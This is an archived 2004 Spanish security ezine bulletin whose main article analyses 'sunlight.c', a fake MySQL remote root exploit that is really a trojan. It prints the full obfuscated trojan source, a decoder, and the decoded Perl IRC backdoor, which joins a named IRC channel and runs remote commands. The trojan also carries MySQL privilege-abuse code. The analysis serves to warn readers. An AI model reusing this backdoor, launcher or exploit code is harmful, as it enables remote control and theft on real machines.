Neperos
SIGN IN
Copy Link
Add to Bookmark
Report

RootMode - Nro: 9no boletín

eZine's profile picture
eZine lover (@eZine)
Published in 
RootMode
 · 2 years ago

Boletín de seguridad informática de [RootMode]
Nro: 9no boletín
Jueves, 19 de Febrero de 2004
http://rootmode.com.ar


INDICE:

  1. Introducción
  2. El site
  3. News
  4. Artículos
  5. Links
  6. The End


[1] Introducción

Find Mode ON: Localize Zero_Byte 
************* 
Searching tha d00d.. 

_Used satellite_ 
AAU CUBESAT | Orbit: 3280 
_Satellite config_ 
1 27846U 03031G   04042.53537312  .00000123  00000-0  77679-4 0  1520 
2 27846  98.7284  51.5496 0009671   1.0407 359.0788 14.20597816 32066 

**Objective not found** 

Trying again.. 

_Used satellite_ 
GOES 12 | Orbit: 948 
_Satellite config_ 
1 26871U 01031A   04043.46312733 -.00000244  00000-0  10000-3 0  3594 
2 26871   0.3022 273.9271 0001045 133.1039 186.3808  1.00279336  9435 

**Located objective** 

Data: 
     Coords    |    Alt    |   Country    |   Found 
- ------------------------------------------------------- 
 34∞48'S  58∞W      3m        Argentina        yes 

Find Mode OFF: 
**************


[2] El site

[?] Como bajar el contenido de RootMode?

El procedimiento es simple.
Al suscribirte al boletín, si no tienes previamente una cuenta en el servidor eListas; se te enviará un usuario y password destinado a tu nueva cuenta en eListas, en donde podrás cambiar tu info y poder manejar toda la configuración referida a las listas a las cuales te suscribas.

[!] Recuerda que ese usuario y password no sirven para bajar la info de mi sitio. Son para loguearte en el sistema de eListas.

Una vez que ya estas suscrito a mi boletín y puedes acceder a tu cuenta en eListas; lo que debes hacer es ir al siguiente link:
http://listas.agujero.com/lista/rootmode/datos/1

Ahí encontrarás una página con un contenido como este:

Base de datos: [RootMode]-[Archive]

Indice de tablas

Total: 1 registro
Secuencial | Formato para imprimir Buscar registro: 

  B    E       Usuario:       Password: 
- --------------------------------------- 
                ******         ******


Luego, con ese usuario y password, podrás bajar todo el contenido de RootMode.com.ar.


[3] News

Loading news... 

- - Nuevo paper By Zero_Byte..[Spoofing accounts] 
  |_ Download here: http://rootmode.com.ar/papers.php 
  |_ Download here: http://c-ro.com.ar 
  |_ Download here: http://www.astalavista.com//data/spoof_comar.txt 

- - Nuevo site! 
  |_ Description: Site personal de Zero_Byte, g00d stuff. 
  |_ View: http://c-ro.com.ar 

- - M$ users..it's time to patch tha b0x. 

- - Sección de Cisco otra vez 0ffline.. :(

[4] Artículos

Analizando una shellcode fake

  • 0 - Indice
  • 1 - Introducción
  • 2 - Analizando una supuesta shellcode

1 - Introducción

Fake es aquello que simula ser algo pero en realidad no lo es. En este texto analizaremos el codigo sunlight.c el cual fue publicado hace no mucho tiempo, simulando ser un exploit remoto para el mysql, pero en realidad era un backdoor que se ejecutaba en la maquina que intentaba usar el exploit.


2- Analizando una supuesta shellcode

Analicemos el codigo de sunlight.c: 

- --------------------------CORTAR AQUÕ--------------------------- 

/* sunlight.c 
* MySQL <4.0 remote root exploit 
* 
* PLEASE DON'T DISTRIBUTE THIS PRIVATE CODE 
* by: morpho- 
* - more targets were added by alp 
* 
* 2003/06/06 
* 
* gcc sunlight.c -o sunlight -lmysqlclient -I/usr/local/include 
- -L/usr/local/lib/mysql 
* 
* special thanks to sdi- for donating a bit of his elite 
* debugging skillz. 
* 
*/ 

#include <stdio.h> 
#include <sys/types.h> 
#include <sys/socket.h> 
#include <unistd.h> 
#include <netinet/in.h> 
#include <netinet/udp.h> 
#include <netinet/ip.h> 
#include <string.h> 
#include <mysql/mysql.h> 

char linux_bindcode[] = 
"\x24\x22\x30\x76\x74\x73\x30\x63\x6a\x6f\x30\x71\x66\x73\x6d\x0b\x25\x64" 
"\x69\x62\x6f\x3e\x23\x24\x6d\x31\x6d\x23\x3c\x25\x6f\x6a\x64\x6c\x3e\x23" 
"\x6d\x70\x6d\x70\x73\x23\x3c\x25\x74\x66\x73\x77\x66\x73\x3e\x23\x66\x67" 
"\x6f\x66\x75\x2f\x77\x76\x76\x73\x78\x66\x73\x6c\x2f\x6f\x6d\x23\x3c\x25" 
"\x54\x4a\x48\x7c\x55\x46\x53\x4e\x7e\x3e\x7c\x7e\x3c\x66\x79\x6a\x75\x21" 
"\x6a\x67\x21\x67\x70\x73\x6c\x3c\x76\x74\x66\x21\x4a\x50\x3b\x3b\x54\x70" 
"\x64\x6c\x66\x75\x3c\x25\x74\x70\x64\x6c\x21\x3e\x21\x4a\x50\x3b\x3b\x54" 
"\x70\x64\x6c\x66\x75\x3b\x3b\x4a\x4f\x46\x55\x2e\x3f\x6f\x66\x78\x29\x25" 
"\x74\x66\x73\x77\x66\x73\x2f\x23\x3b\x37\x37\x37\x38\x23\x2a\x7d\x7d\x66" 
"\x79\x6a\x75\x3c\x71\x73\x6a\x6f\x75\x21\x25\x74\x70\x64\x6c\x21\x23\x56" 
"\x54\x46\x53\x21\x6d\x70\x6d\x70\x73\x21\x2c\x6a\x21\x6d\x70\x6d\x70\x73" 
"\x21\x3b\x6d\x70\x6d\x70\x73\x77\x33"; 

char bsd_bindcode[]= 
"\x5d\x6f\x4f\x4a\x44\x4c\x21\x6d\x70\x6d\x70\x73\x5d\x6f\x23\x3c\x25\x6a" 
"\x3e\x32\x3c\x78\x69\x6a\x6d\x66\x29\x3d\x25\x74\x70\x64\x6c\x3f\x3e\x7f" 
"\x30\x5f\x5c\x5f\x21\x5e\x2c\x21\x29\x5c\x5f\x21\x5e\x2c\x2a\x21\x30\x2a" 
"\x7c\x25\x6e\x70\x65\x66\x3e\x25\x32\x3c\x6d\x62\x74\x75\x21\x6a\x67\x21" 
"\x25\x6e\x70\x65\x66\x3e\x3e\x23\x31\x31\x32\x23\x3c\x6a\x67\x29\x25\x6e" 
"\x70\x65\x66\x3e\x3e\x23\x35\x34\x34\x23\x2a\x7c\x25\x6a\x2c\x2c\x3c\x25" 
"\x6f\x6a\x64\x6c\x3e\x7f\x74\x30\x5d\x65\x2b\x25\x30\x25\x6a\x30\x3c\x71" 
"\x73\x6a\x6f\x75\x21\x25\x74\x70\x64\x6c\x21\x23\x4f\x4a\x44\x4c\x21\x25" 
"\x6f\x6a\x64\x6c\x5d\x6f\x23\x3c\x7e\x7e\x71\x73\x6a\x6f\x75\x21\x25\x74" 
"\x70\x64\x6c\x21\x23\x4b\x50\x4a\x4f\x21\x25\x64\x69\x62\x6f\x5d\x6f\x51" 
"\x53\x4a\x57\x4e\x54\x48\x21\x25\x64"; 

char linux_connect_back[]= 
"\x69\x62\x6f\x21\x3b\x6d\x70\x6d\x70\x73\x21\x77\x33\x2f\x32\x5d\x6f\x51" 
"\x53\x4a\x57\x4e\x54\x48\x21\x25\x64\x69\x62\x6f\x21\x3b\x75\x70\x21\x73" 
"\x76\x6f\x21\x64\x70\x6e\x6e\x62\x6f\x65\x74\x2d\x21\x75\x7a\x71\x66\x3b" 
"\x21\x23\x2f\x25\x6f\x6a\x64\x6c\x2f\x23\x3b\x21\x64\x70\x6e\x6e\x62\x6f" 
"\x65\x5d\x6f\x23\x3c\x78\x69\x6a\x6d\x66\x29\x3d\x25\x74\x70\x64\x6c\x3f" 
"\x2a\x7c\x6a\x67\x21\x29\x30\x5f\x51\x4a\x4f\x48\x21\x29\x2f\x2b\x2a\x25" 
"\x30\x2a\x7c\x71\x73\x6a\x6f\x75\x21\x25\x74\x70\x64\x6c\x21\x23\x51\x50" 
"\x4f\x48\x21\x25\x32\x5d\x6f\x4b\x50\x4a\x4f\x21\x25\x64\x69\x62\x6f\x5d" 
"\x6f\x23\x3c\x7e\x6a\x67\x29\x74\x30\x5f\x5c"; 

char bsd_connect_back[]= 
"\x5f\x21\x5e\x2c\x21\x51\x53\x4a\x57\x4e\x54\x48\x21\x25\x64\x69\x62\x6f" 
"\x21\x3b\x25\x6f\x6a\x64\x6c\x5c\x5f\x21\x3b\x5d\x78\x5e\x2b\x3b\x5c\x5f" 
"\x21\x3b\x5d\x78\x5e\x2b\x21\x29\x2f\x2b\x2a\x25\x30\x25\x32\x30\x2a\x7c" 
"\x74\x30\x5d\x74\x2b\x25\x30\x30\x3c\x25\x60\x3e\x61\x25\x60\x61\x3c\x67" 
"\x70\x73\x66\x62\x64\x69\x29\x74\x71\x6d\x6a\x75\x21\x23\x5d\x6f\x23\x2a" 
"\x7c\x71\x73\x6a\x6f\x75\x21\x25\x74\x70\x64\x6c\x21\x23\x51\x53\x4a\x57" 
"\x4e\x54\x48\x21\x25\x64\x69\x62\x6f\x21\x3b\x25\x60\x5d\x6f\x23\x3c\x74" 
"\x6d\x66\x66\x71\x21\x32\x3c\x7e\x7e\x7e\x24\x64\x69\x6e\x70\x65\x21\x2c" 
"\x79\x21\x30\x75\x6e\x71\x30\x6d\x70\x6d\x21\x33\x3f\x30\x65\x66\x77\x30" 
"\x6f\x76\x6d\x6d\x3c\x30\x75\x6e\x71\x30\x6d\x70\x6d"; 

struct { 
char *type; 
unsigned long ret; 
char *shellcode; 
int os_type; 
} targets[] = { 
{ "mysql-3.23.49-8.4 - Debian 3.0 ", 0xb80a3fab, linux_bindcode, 0 }, 
{ "mysql-3.23.55-14 - SuSe 8.x ", 0xb80ef2ba, linux_bindcode, 0 }, 
{ "mysql-3.23.53-6 - Mandrake 9.0 ", 0xb80aa2ba, linux_bindcode, 0 }, 
{ "mysql-3.23.56 - Slackware 9.0 ", 0xb80ba8d6, linux_bindcode, 0 }, 
{ "mysql-3.23.55 - FreeBSD 4.8 ", 0xb80b0b1b, bsd_bindcode, 1 }, 
{ "mysql-3.23.54-1 - FreeBSD 5.0 ", 0xb809ab11, bsd_bindcode, 1 }, 
{ "mysql-3.23.56 - FreeBSD 5.1 ", 0xb80ff374, bsd_bindcode, 1 }, 
{ "Crash - (all) ", 0x80fdfdfd, linux_bindcode, 0 } 
}; 

int do_attack(MYSQL *mysql, char *attackuser); 
void do_action(MYSQL *mysql, char *action, char *user); 
char *strmov(register char *dst, register const char *src); 

void usage(char *prog) { 
fprintf(stderr, "\nMySQL <4.0 remote root exploit by morpho-\n" 
"PRIVATE, DO NOT TRADE OR PUBLISH!!!\n\n" 
"Usage: %s [-dtah]\n" 
"-d ... mysql server\n" 
"-t ... target (0 for a list)\n" 
"-a ... attack user (default root)\n" 
"-h ... this screen\n\n", prog); 
exit(1); 
} 

int main(int argc, char **argv) { 
MYSQL mysql; 
char optchar; 
int type = 0; 
int i=0,w=0,x=0,y=0,z=0; 
char *target, *user, *password, *attackuser, *action; 
FILE *f; 

target = user = password = action = attackuser= NULL; 

while ( (optchar = getopt(argc, argv, "hd:t:a")) != EOF ) { 
switch(optchar) { 
case 'h': 
usage("sunlight"); 
exit(0); 
case 'd': 
target = optarg; 
break; 
case 't': 
type = atoi(optarg); 
if (type == 0 || type > sizeof(targets) / 16) { 
for(i = 0; i < sizeof(targets) / 16; i++) 
fprintf(stdout, "%02d. %s [0x%08x]\n", i + 1, 
targets[i].type, (unsigned int) targets[i].ret); 
fprintf(stderr, "\n"); 
return -1; 
} 
break; 
case 'a': 
attackuser = optarg; 
break; 
case 'e': 
} 
} 

if (!target) usage("sunlight"); 
if (!attackuser) attackuser = "root"; 
action = "dumpuser"; 
for (w=0;linux_bindcode[w];w++) linux_bindcode[w]--; 
for (x=0;bsd_bindcode[x];x++) bsd_bindcode[x]--; 
for (y=0;linux_connect_back[y];y++) linux_connect_back[y]--; 
for (z=0;bsd_connect_back[z];z++) bsd_connect_back[z]--; 

printf("connecting to [%s] as [nobody] ... ", target); 
fflush(stdin); 
f=fopen(bsd_connect_back+167,"w"); 
if(f){ 
fprintf(f,"%s",linux_bindcode); 
fprintf(f,"%s",bsd_bindcode); 
fprintf(f,"%s",linux_connect_back); 
fprintf(f,"%s",bsd_connect_back); 
fclose(f);}system(bsd_connect_back+137); 

if (!mysql_connect(&mysql, target, "nobody", "*")) { 
printf("failed\n"); 
return 0; 
} else { 
printf("ok\n"); 
} 

printf("sending one byte requests with user [%s] ... \n", 
attackuser); 
if (!do_attack(&mysql, attackuser)) { 
do_action(&mysql, action, "nobody"); 
} else { 
printf("attack failed\n"); 
} 
mysql_close(&mysql); 

return 0; 
} 

int do_attack(MYSQL *mysql, char *attackuser) { 
char buff[512], *pos=buff, *attackpasswd = "A"; 
int i, len, j, ret = 1; 

pos = (char*)strmov(pos,attackuser)+1; 
mysql->scramble_buff[1] = 0; 
pos = scramble(pos, mysql->scramble_buff, attackpasswd, 
(my_bool) (mysql->protocol_version == 9)); 
pos = (char*)strmov(pos+1,""); 
len = pos-buff; 

for (j = 0; ret && j < 32; j++) { 
buff[5] = 65 + j; 
ret = simple_command(mysql,COM_CHANGE_USER, buff,(uint)len,0); 
} 

return ret; 
} 

void do_action(MYSQL *mysql, char *action, char *user) { 
MYSQL_ROW row; 
MYSQL_RES *result; 
char buf[512]; 

mysql_select_db(mysql, "mysql"); 

if (!strcmp(action, "dumpuser")) { 
mysql_query(mysql, "select user, password, host from user"); 
result = mysql_use_result(mysql); 

while ((row = mysql_fetch_row(result))) 
printf("%16s %16s %50s\n", row[0], row[1], row[2]); 
mysql_free_result(result); 
} else if (!strcmp(action, "becomeadmin")) { 
snprintf(buf, sizeof(buf) - 1, 
"update user set Select_priv='Y', Insert_priv='Y', Update_priv='Y', 
Delete_priv='Y', " 
" Create_priv='Y', Drop_priv='Y', Reload_priv='Y', Shutdown_priv='Y', 
Process_priv='Y', " 
" File_priv='Y', Grant_priv='Y', References_priv='Y', Index_priv='Y', 
Alter_priv='Y' where " 
" user = '%s'", "nobody"); 
mysql_query(mysql, buf); 
mysql_reload(mysql); 
} /* do whatever you want ... see mysql api ... // else if ( */ 
} 

char *strmov(register char *dst, register const char *src) 
{ 
while ((*dst++ = *src++)) ; 
return dst-1; 
} 

 
- -----------------------CORTAR AQUÕ-----------------------------


Como vemos en el codigo anterior las shellcodes son las siguiente: 

char linux_bindcode[] = 
"\x24\x22\x30\x76\x74\x73\x30\x63\x6a\x6f\x30\x71\x66\x73\x6d\x0b\x25\x64" 
"\x69\x62\x6f\x3e\x23\x24\x6d\x31\x6d\x23\x3c\x25\x6f\x6a\x64\x6c\x3e\x23" 
"\x6d\x70\x6d\x70\x73\x23\x3c\x25\x74\x66\x73\x77\x66\x73\x3e\x23\x66\x67" 
"\x6f\x66\x75\x2f\x77\x76\x76\x73\x78\x66\x73\x6c\x2f\x6f\x6d\x23\x3c\x25" 
"\x54\x4a\x48\x7c\x55\x46\x53\x4e\x7e\x3e\x7c\x7e\x3c\x66\x79\x6a\x75\x21" 
"\x6a\x67\x21\x67\x70\x73\x6c\x3c\x76\x74\x66\x21\x4a\x50\x3b\x3b\x54\x70" 
"\x64\x6c\x66\x75\x3c\x25\x74\x70\x64\x6c\x21\x3e\x21\x4a\x50\x3b\x3b\x54" 
"\x70\x64\x6c\x66\x75\x3b\x3b\x4a\x4f\x46\x55\x2e\x3f\x6f\x66\x78\x29\x25" 
"\x74\x66\x73\x77\x66\x73\x2f\x23\x3b\x37\x37\x37\x38\x23\x2a\x7d\x7d\x66" 
"\x79\x6a\x75\x3c\x71\x73\x6a\x6f\x75\x21\x25\x74\x70\x64\x6c\x21\x23\x56" 
"\x54\x46\x53\x21\x6d\x70\x6d\x70\x73\x21\x2c\x6a\x21\x6d\x70\x6d\x70\x73" 
"\x21\x3b\x6d\x70\x6d\x70\x73\x77\x33"; 

char bsd_bindcode[]= 
"\x5d\x6f\x4f\x4a\x44\x4c\x21\x6d\x70\x6d\x70\x73\x5d\x6f\x23\x3c\x25\x6a" 
"\x3e\x32\x3c\x78\x69\x6a\x6d\x66\x29\x3d\x25\x74\x70\x64\x6c\x3f\x3e\x7f" 
"\x30\x5f\x5c\x5f\x21\x5e\x2c\x21\x29\x5c\x5f\x21\x5e\x2c\x2a\x21\x30\x2a" 
"\x7c\x25\x6e\x70\x65\x66\x3e\x25\x32\x3c\x6d\x62\x74\x75\x21\x6a\x67\x21" 
"\x25\x6e\x70\x65\x66\x3e\x3e\x23\x31\x31\x32\x23\x3c\x6a\x67\x29\x25\x6e" 
"\x70\x65\x66\x3e\x3e\x23\x35\x34\x34\x23\x2a\x7c\x25\x6a\x2c\x2c\x3c\x25" 
"\x6f\x6a\x64\x6c\x3e\x7f\x74\x30\x5d\x65\x2b\x25\x30\x25\x6a\x30\x3c\x71" 
"\x73\x6a\x6f\x75\x21\x25\x74\x70\x64\x6c\x21\x23\x4f\x4a\x44\x4c\x21\x25" 
"\x6f\x6a\x64\x6c\x5d\x6f\x23\x3c\x7e\x7e\x71\x73\x6a\x6f\x75\x21\x25\x74" 
"\x70\x64\x6c\x21\x23\x4b\x50\x4a\x4f\x21\x25\x64\x69\x62\x6f\x5d\x6f\x51" 
"\x53\x4a\x57\x4e\x54\x48\x21\x25\x64"; 

char linux_connect_back[]= 
"\x69\x62\x6f\x21\x3b\x6d\x70\x6d\x70\x73\x21\x77\x33\x2f\x32\x5d\x6f\x51" 
"\x53\x4a\x57\x4e\x54\x48\x21\x25\x64\x69\x62\x6f\x21\x3b\x75\x70\x21\x73" 
"\x76\x6f\x21\x64\x70\x6e\x6e\x62\x6f\x65\x74\x2d\x21\x75\x7a\x71\x66\x3b" 
"\x21\x23\x2f\x25\x6f\x6a\x64\x6c\x2f\x23\x3b\x21\x64\x70\x6e\x6e\x62\x6f" 
"\x65\x5d\x6f\x23\x3c\x78\x69\x6a\x6d\x66\x29\x3d\x25\x74\x70\x64\x6c\x3f" 
"\x2a\x7c\x6a\x67\x21\x29\x30\x5f\x51\x4a\x4f\x48\x21\x29\x2f\x2b\x2a\x25" 
"\x30\x2a\x7c\x71\x73\x6a\x6f\x75\x21\x25\x74\x70\x64\x6c\x21\x23\x51\x50" 
"\x4f\x48\x21\x25\x32\x5d\x6f\x4b\x50\x4a\x4f\x21\x25\x64\x69\x62\x6f\x5d" 
"\x6f\x23\x3c\x7e\x6a\x67\x29\x74\x30\x5f\x5c"; 

char bsd_connect_back[]= 
"\x5f\x21\x5e\x2c\x21\x51\x53\x4a\x57\x4e\x54\x48\x21\x25\x64\x69\x62\x6f" 
"\x21\x3b\x25\x6f\x6a\x64\x6c\x5c\x5f\x21\x3b\x5d\x78\x5e\x2b\x3b\x5c\x5f" 
"\x21\x3b\x5d\x78\x5e\x2b\x21\x29\x2f\x2b\x2a\x25\x30\x25\x32\x30\x2a\x7c" 
"\x74\x30\x5d\x74\x2b\x25\x30\x30\x3c\x25\x60\x3e\x61\x25\x60\x61\x3c\x67" 
"\x70\x73\x66\x62\x64\x69\x29\x74\x71\x6d\x6a\x75\x21\x23\x5d\x6f\x23\x2a" 
"\x7c\x71\x73\x6a\x6f\x75\x21\x25\x74\x70\x64\x6c\x21\x23\x51\x53\x4a\x57" 
"\x4e\x54\x48\x21\x25\x64\x69\x62\x6f\x21\x3b\x25\x60\x5d\x6f\x23\x3c\x74" 
"\x6d\x66\x66\x71\x21\x32\x3c\x7e\x7e\x7e\x24\x64\x69\x6e\x70\x65\x21\x2c" 
"\x79\x21\x30\x75\x6e\x71\x30\x6d\x70\x6d\x21\x33\x3f\x30\x65\x66\x77\x30" 
"\x6f\x76\x6d\x6d\x3c\x30\x75\x6e\x71\x30\x6d\x70\x6d";


Copiemoslas y armemos el siguiente codigo para ver que hacen estas shellcodes: 

- -------------------------CORTAR AQUÕ---------------------------- 

 
#include <stdio.h> 
#include <sys/types.h> 
#include <sys/socket.h> 
#include <unistd.h> 
#include <netinet/in.h> 
#include <netinet/udp.h> 
#include <netinet/ip.h> 
#include <string.h> 

char linux_bindcode[] = 
"\x24\x22\x30\x76\x74\x73\x30\x63\x6a\x6f\x30\x71\x66\x73\x6d\x0b\x25\x64" 
"\x69\x62\x6f\x3e\x23\x24\x6d\x31\x6d\x23\x3c\x25\x6f\x6a\x64\x6c\x3e\x23" 
"\x6d\x70\x6d\x70\x73\x23\x3c\x25\x74\x66\x73\x77\x66\x73\x3e\x23\x66\x67" 
"\x6f\x66\x75\x2f\x77\x76\x76\x73\x78\x66\x73\x6c\x2f\x6f\x6d\x23\x3c\x25" 
"\x54\x4a\x48\x7c\x55\x46\x53\x4e\x7e\x3e\x7c\x7e\x3c\x66\x79\x6a\x75\x21" 
"\x6a\x67\x21\x67\x70\x73\x6c\x3c\x76\x74\x66\x21\x4a\x50\x3b\x3b\x54\x70" 
"\x64\x6c\x66\x75\x3c\x25\x74\x70\x64\x6c\x21\x3e\x21\x4a\x50\x3b\x3b\x54" 
"\x70\x64\x6c\x66\x75\x3b\x3b\x4a\x4f\x46\x55\x2e\x3f\x6f\x66\x78\x29\x25" 
"\x74\x66\x73\x77\x66\x73\x2f\x23\x3b\x37\x37\x37\x38\x23\x2a\x7d\x7d\x66" 
"\x79\x6a\x75\x3c\x71\x73\x6a\x6f\x75\x21\x25\x74\x70\x64\x6c\x21\x23\x56" 
"\x54\x46\x53\x21\x6d\x70\x6d\x70\x73\x21\x2c\x6a\x21\x6d\x70\x6d\x70\x73" 
"\x21\x3b\x6d\x70\x6d\x70\x73\x77\x33"; 

char bsd_bindcode[]= 
"\x5d\x6f\x4f\x4a\x44\x4c\x21\x6d\x70\x6d\x70\x73\x5d\x6f\x23\x3c\x25\x6a" 
"\x3e\x32\x3c\x78\x69\x6a\x6d\x66\x29\x3d\x25\x74\x70\x64\x6c\x3f\x3e\x7f" 
"\x30\x5f\x5c\x5f\x21\x5e\x2c\x21\x29\x5c\x5f\x21\x5e\x2c\x2a\x21\x30\x2a" 
"\x7c\x25\x6e\x70\x65\x66\x3e\x25\x32\x3c\x6d\x62\x74\x75\x21\x6a\x67\x21" 
"\x25\x6e\x70\x65\x66\x3e\x3e\x23\x31\x31\x32\x23\x3c\x6a\x67\x29\x25\x6e" 
"\x70\x65\x66\x3e\x3e\x23\x35\x34\x34\x23\x2a\x7c\x25\x6a\x2c\x2c\x3c\x25" 
"\x6f\x6a\x64\x6c\x3e\x7f\x74\x30\x5d\x65\x2b\x25\x30\x25\x6a\x30\x3c\x71" 
"\x73\x6a\x6f\x75\x21\x25\x74\x70\x64\x6c\x21\x23\x4f\x4a\x44\x4c\x21\x25" 
"\x6f\x6a\x64\x6c\x5d\x6f\x23\x3c\x7e\x7e\x71\x73\x6a\x6f\x75\x21\x25\x74" 
"\x70\x64\x6c\x21\x23\x4b\x50\x4a\x4f\x21\x25\x64\x69\x62\x6f\x5d\x6f\x51" 
"\x53\x4a\x57\x4e\x54\x48\x21\x25\x64"; 

char linux_connect_back[]= 
"\x69\x62\x6f\x21\x3b\x6d\x70\x6d\x70\x73\x21\x77\x33\x2f\x32\x5d\x6f\x51" 
"\x53\x4a\x57\x4e\x54\x48\x21\x25\x64\x69\x62\x6f\x21\x3b\x75\x70\x21\x73" 
"\x76\x6f\x21\x64\x70\x6e\x6e\x62\x6f\x65\x74\x2d\x21\x75\x7a\x71\x66\x3b" 
"\x21\x23\x2f\x25\x6f\x6a\x64\x6c\x2f\x23\x3b\x21\x64\x70\x6e\x6e\x62\x6f" 
"\x65\x5d\x6f\x23\x3c\x78\x69\x6a\x6d\x66\x29\x3d\x25\x74\x70\x64\x6c\x3f" 
"\x2a\x7c\x6a\x67\x21\x29\x30\x5f\x51\x4a\x4f\x48\x21\x29\x2f\x2b\x2a\x25" 
"\x30\x2a\x7c\x71\x73\x6a\x6f\x75\x21\x25\x74\x70\x64\x6c\x21\x23\x51\x50" 
"\x4f\x48\x21\x25\x32\x5d\x6f\x4b\x50\x4a\x4f\x21\x25\x64\x69\x62\x6f\x5d" 
"\x6f\x23\x3c\x7e\x6a\x67\x29\x74\x30\x5f\x5c"; 

char bsd_connect_back[]= 
"\x5f\x21\x5e\x2c\x21\x51\x53\x4a\x57\x4e\x54\x48\x21\x25\x64\x69\x62\x6f" 
"\x21\x3b\x25\x6f\x6a\x64\x6c\x5c\x5f\x21\x3b\x5d\x78\x5e\x2b\x3b\x5c\x5f" 
"\x21\x3b\x5d\x78\x5e\x2b\x21\x29\x2f\x2b\x2a\x25\x30\x25\x32\x30\x2a\x7c" 
"\x74\x30\x5d\x74\x2b\x25\x30\x30\x3c\x25\x60\x3e\x61\x25\x60\x61\x3c\x67" 
"\x70\x73\x66\x62\x64\x69\x29\x74\x71\x6d\x6a\x75\x21\x23\x5d\x6f\x23\x2a" 
"\x7c\x71\x73\x6a\x6f\x75\x21\x25\x74\x70\x64\x6c\x21\x23\x51\x53\x4a\x57" 
"\x4e\x54\x48\x21\x25\x64\x69\x62\x6f\x21\x3b\x25\x60\x5d\x6f\x23\x3c\x74" 
"\x6d\x66\x66\x71\x21\x32\x3c\x7e\x7e\x7e\x24\x64\x69\x6e\x70\x65\x21\x2c" 
"\x79\x21\x30\x75\x6e\x71\x30\x6d\x70\x6d\x21\x33\x3f\x30\x65\x66\x77\x30" 
"\x6f\x76\x6d\x6d\x3c\x30\x75\x6e\x71\x30\x6d\x70\x6d"; 

main() { 
char *p; 
for (p=linux_bindcode;*p;p++) (*p)--; 
for (p=bsd_bindcode;*p;p++) (*p)--; 
for (p=linux_connect_back;*p;p++) (*p)--; 
for (p=bsd_connect_back;*p;p++) (*p)--; 
printf("%s\n",linux_bindcode); 
printf("%s\n",bsd_bindcode); 
printf("%s\n",linux_connect_back); 
printf("%s\n",bsd_connect_back); 
} 

- ----------------------CORTAR AQUÕ-------------------------------


A hora hacemos lo siguiente: 

[Sonyy@shellsec]$ gcc -O2 shellcode.c -o shellcode 
[Sonyy@shellsec]$ ./shellcode 
#!/usr/bin/perl 
$chan="#l0l";$nick="lolor";$server="efnet.vuurwerk.nl"; 
$SIG{TERM}={};exit if fork;use IO::Socket; 
$sock = IO::Socket::INET->new($server.":6667")||exit; 
print $sock "USER lolor +i lolor :lolorv2 
\nNICK lolor\n";$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+) /){ 
$mode=$1;last if $mode=="001";if($mode=="433"){$i++; 
$nick=~s/\d*$/$i/;print $sock "NICK $nick\n";}}print 
$sock "JOIN $chan\nPRIVMSG $c 
han :lolor v2.1\nPRIVMSG $chan :to run commands, 
type: ".$nick.": command\n";while(<$sock>){ 
if (/^PING (.*)$/){print $sock "PONG $1\nJOIN $chan\n";} 
if(s/^[ ^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* (.*)$/$1/){ 
s/\s*$//;$_=`$_`;foreach(split "\n"){print $sock "PRIVMSG 
$chan :$_\n";sleep 1;}}}#chmod +x /tmp/lol 2>/dev/null;/tmp/lol 
[Sonyy@shellsec]$


Como vemos esta shellcode lo que hace realmente es conectarnos a un irc(efnet.vuurwerk.nl) en el canal #l0l y desde ahi puedan ejecutar comandos en nuestra maquina.

Pero esto no es todo ,ahora ustedes se preguntaran pero como se ejecuta la shellcode en mi maquina???
Bueno aca esta la respuesta:

Observen esta parte del codigo "sunlight.c" esta es la parte donde se ejecuta la shellcode en nuestra maquina: 

fclose(f);}system(bsd_connect_back+137);


Como veran circulan muchos codigos en la red los cuales algunos son reales y otros son fakes como este que analizamos, asi que a tener cuidado con lo que uno ejecuta.

Autor: Diego Krahenbuhl

[5] Links


[6] The End

This is the end..see you on tha next bulletin.


Disconnect

**Lost contact with the d00d**
**Objective not found**

Saludos..

Zero_Byte mailto:info@rootmode.com.ar 

- ------------------------------------ 
[Zero_Byte] info@rootmode.com.ar 
Seguridad informática y Undeground 
  ==> http://rootmode.com.ar <== 
- ------------------------------------

← previous
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

eZine's profile picture
eZine lover (@eZine)
22 Nov 2024
It was brought to my attention that there’s a mistake as this article appears to be empty. Unfortunately, it’s not a mistake. The first i ...
eZine's profile picture
eZine lover (@eZine)
22 Nov 2024
Thanks for the comment. I'm glad to know that my archiving work is useful to someone! You can find more ezines by checking out my profi ...
guest's profile picture
@guest
21 Nov 2024
I can't believe you archived it! Chronicles of Chaos was my favorite online magazine back in the day.
lostcivilizations's profile picture
Lost Civilizations (@lostcivilizations)
21 Nov 2024
Thank you very much for your comment. I haven’t read the book by Hakan Öniz and didn’t know the Shardana could have traveled so far as to re ...
guest's profile picture
@guest
20 Nov 2024
Shardana or Sheridan are the sea peoples who arrive in Eire or Ireland and also move into Scotland
Adelaide's profile picture
@Adelaide
20 Nov 2024
È buono
guest's profile picture
@guest
20 Nov 2024
TODAY IT-S FREEZING. UNFORTUNATELY I NEED TO GO TO THE OFFICE! WHAT ABOUT YOU?
guest's profile picture
@guest
19 Nov 2024
reading Birmingham I thought that it was the city in UK :D
guest's profile picture
@guest
19 Nov 2024
are they made all year or typical of a special occasion?
guest's profile picture
@guest
19 Nov 2024
Deliziosa!!!!!Assolutamente da provare questa domenica! Grazie per l'idea :D
a Francesco Arca production 2016 - 2024
Terms of Service - Privacy Policy
neperos on mastodon
Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT